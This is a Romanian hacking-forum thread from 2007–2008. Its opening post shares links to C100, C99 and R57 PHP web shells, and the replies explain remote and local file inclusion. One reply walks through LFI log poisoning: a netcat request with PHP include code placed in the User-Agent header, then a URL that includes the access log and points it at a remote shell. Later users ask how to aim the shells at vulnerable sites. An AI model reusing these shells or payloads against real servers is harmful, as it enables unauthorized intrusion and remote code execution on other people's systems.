zbeng Posted December 20, 2007 Report Share Posted December 20, 2007 C100http://www.friendsterlayout.org/uploads/images/2007-12-09/iVLbkTUSL1.txthttp://www.spaceassistant.com/uploads/images/2007-12-09/hTQiO5mPR4.txthttp://www.myflirtyspace.com/uploads/images/2007-12-09/M08xZU3BpB.txthttp://www.ww64.com/uploads/images/2007-12-09/sZ9L0selWW.txthttp://continuumbuzz.com/uploads/images/2007-12-09/INe59ZqYVU.txtC99http://www.friendsterlayout.org/uploads/images/2007-12-09/lKEFOH8lzJ.txthttp://www.spaceassistant.com/uploads/images/2007-12-09/7xf4C15Zn0.txthttp://www.myflirtyspace.com/uploads/images/2007-12-09/cRrBLrhkFC.txthttp://www.ww64.com/uploads/images/2007-12-09/iunGmQ0M8O.txthttp://continuumbuzz.com/uploads/images/2007-12-09/2F7sSpHlpO.txtR57http://www.friendsterlayout.org/uploads/images/2007-12-09/hqHGGSjy8W.txthttp://www.spaceassistant.com/uploads/images/2007-12-09/MAxpS7mPlt.txthttp://www.myflirtyspace.com/uploads/images/2007-12-09/wL0sdaTqGA.txthttp://www.ww64.com/uploads/images/2007-12-09/4LFfbMLrlc.txthttp://continuumbuzz.com/uploads/images/2007-12-09/9omRMCPLrl.txt Quote Link to comment Share on other sites More sharing options...
unix.vali Posted December 20, 2007 Report Share Posted December 20, 2007 sper sa nu comit vreo penibilitate aici pe forum ... dar ce e mai sus sunt virusi (am descoperit gaura la macaroana ) Quote Link to comment Share on other sites More sharing options...
tw8 Posted December 20, 2007 Report Share Posted December 20, 2007 @unix.vali:Shellurile sunt detectate ca fiind virusi, pentru ca sunt folosite pentru exploatarea RFI si LFI.De obicei, daca nu e vreun admin nesimtit, ele sunt 'curate'.@zbeng: Nice share ! Quote Link to comment Share on other sites More sharing options...
unix.vali Posted December 20, 2007 Report Share Posted December 20, 2007 mersi de clarificare. acum inca una dupa parerea mea rfi inseamna remote file injection si lfi = local file injection ? si cu un shell scanezi dupa vulnerabilitati ?(scuze de intrebarile care simt ca-s cam stupide dar webhackingul este domeniu in care stiu foarte putine) Quote Link to comment Share on other sites More sharing options...
SirGod Posted December 20, 2007 Report Share Posted December 20, 2007 RFI = Remote File InclusionLFI = Local File Inclusionde shell ai nevoie la RFI de exemplu www.site.com/index.php?page=[aici bagi linku shellului]si cand bagi un shell la urma sa fie shell.txt?...sper ca teai lamurit Quote Link to comment Share on other sites More sharing options...
Guest BanKai Posted December 20, 2007 Report Share Posted December 20, 2007 RFI - REMOTE FILE INCLUSION (includerea unui script hostat pe alta masina*) are un impact major pentru ca ofera semi-shell access la serverul vulnerabil. in scripturile vulnerabile se pot include orice fell de scripturi dar 99% din cei care xploateaza asa ceva folosesc aceste shelluri pentru ca au o interfata user friendly. poate fi inclusa orice extensie de file cu anumite modificari (txt si orice extensie de poza pot fi incluse direct pentru ca vor fi interpretate ca text, php html si alte orice extensii pot fi incluse folosind mod rewrite pe serverul unde este hostat shellul fortzand serverul sa le interpreteze ca text file si sa nu se execute pe el).LFI - LOCAL FILE INCLUSION (bunicul remote file inclusionului permite includerea unui fisier local) are cam acelasi impact cu RFI dar este mai anevoios de exploatat. una din cele mai folosite metode de exploatare este injectarea logurilor pe care voi incerca sa ti'o explic cat mai simplu:in mod normal lfi este useless neputand sa executi fisiere care iti vor da vreun tip de acces la server dar mintea hackerului a gasit o metoda sa il faca folositor. cum ? injectand logurile cu php code . cum se face asta ? eu personal folosesc netcat. metoda este simplista odata ce ajungi sa o cunosti, partea grea este gasirea logurilorparte ce nu o voi aprofunda pentru ca E GREA. presupunem ca logurile au fost gasite . se deschide o conexiune netcat catre hostul vulnerabil pe portul http (80). se trimit http headere malformate care evident vor fi inregistrate de catre loguri fie in error log fie in access log.Exemplu de headere malformate:GET / HTTP/1.1Host: www.victima.comUser-Agent: MOZILLA<? include($_GET[rfi]); ?>Hostul va executa cererea si va salva in loguri accesul.exploatatorul va include apoi logul ca in urmatorul exemplu:http://www.victima.com/vulnerabil.php?parametruvulnerabil=/path/to/log/acces.log?rfi=http://phpshelllocation?astfel fiserul vulnerabil a inclus logul si a executat codul vulnerabil injectat de tine obtinand un RFI care iti va permite un acces mai larg la host.exista si alte metode de exploatare a LFI si nu stau sa le enumar.PS pentru ceilalti utilizatori de pe forum luati exemplu de la vali si invatati cum sa intrebari, astfel va vom raspunde si voua la fel de frumos si nu cu ban sau ironii.*masina = pc/server/host Quote Link to comment Share on other sites More sharing options...
unix.vali Posted December 20, 2007 Report Share Posted December 20, 2007 multumesc. ideea e in felul urmator... informatica asta are muulte laturi d`oh si cand te apuci de ceva ce nu stii cei mai grei pasi ,dupa parerea mea, sunt primii. pentru ca odata invatat basicul incepi sa intelegi tutorialele sa cauti forumurile, sa faci experimente ... dar pana nu ai primii pasi te uiti ca prostu si poate sa fie frustrant. Dar eu am perseverenta Quote Link to comment Share on other sites More sharing options...
moubik Posted December 20, 2007 Report Share Posted December 20, 2007 frumos explicat, dude.ai o mica greseala:mod rewrite este un modul de apache care transforma din link in genul:http://site.com/view/product/1234inhttp://site.com/view.php?product=1234este doar un exemplu. linkurile sunt mai friendly asa.. si din pacate mai greu de exploatat sql injection Quote Link to comment Share on other sites More sharing options...
SirGod Posted December 20, 2007 Report Share Posted December 20, 2007 frumoasa completare BanKai...nu pot compara ce am zis eu cu explicatia ta... Quote Link to comment Share on other sites More sharing options...
katmai Posted December 20, 2007 Report Share Posted December 20, 2007 frumos explicat, dude.ai o mica greseala:mod rewrite este un modul de apache care transforma din link in genul:http://site.com/view/product/1234inhttp://site.com/view.php?product=1234este doar un exemplu. linkurile sunt mai friendly asa.. si din pacate mai greu de exploatat sql injectionPermite-mi sa te corectez..poate ai spus tu corect dar nu am inteles eu .Se transforma:din: http://site.com/view.php?product=1234in:http://site.com/view/product/1234exemplu:RewriteRule ^view/product/([^/]*)+$ product.php?=$1 [L] Quote Link to comment Share on other sites More sharing options...
papagalulverde Posted March 8, 2008 Report Share Posted March 8, 2008 de shell ai nevoie la RFI de exemplu www.site.com/index.php?page=[aici bagi linku shellului]si cand bagi un shell la urma sa fie shell.txt?...sper ca teai lamuritam facut asa cum ai scris tu si nu am nici un rezultat, adica nu functioneaza.poti sa fii un pic mai explicit?si sigur e la sfarsit .txt? si nu .php????eu am incercat cu astahttp://continuumbuzz.com/uploads/images/2007-12-09/9omRMCPLrl.txt?si nimik....Service Temporarily UnavailableThe server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.The precondition on the request for the URL /index.php evaluated to false.cam asa dau raspunsurile....s-a stricat treaba cu ele?sau care e smecheria? Quote Link to comment Share on other sites More sharing options...
georgex_hacker Posted March 9, 2008 Report Share Posted March 9, 2008 shell e dedectat ca virus am incercat sa le iau dar Virus!pacat orikum frumos! Quote Link to comment Share on other sites More sharing options...
keuken Posted July 23, 2008 Report Share Posted July 23, 2008 intrebare : sa zicem ca am descoperit un fisier vulnerabil www.site.com/admin.php?parametruvulnerabilitati= intrebarea mea este cum aflu parametru vulnerabilitati? ca dupa "=" sa continui cu link-ul catre shell sau sql inj Quote Link to comment Share on other sites More sharing options...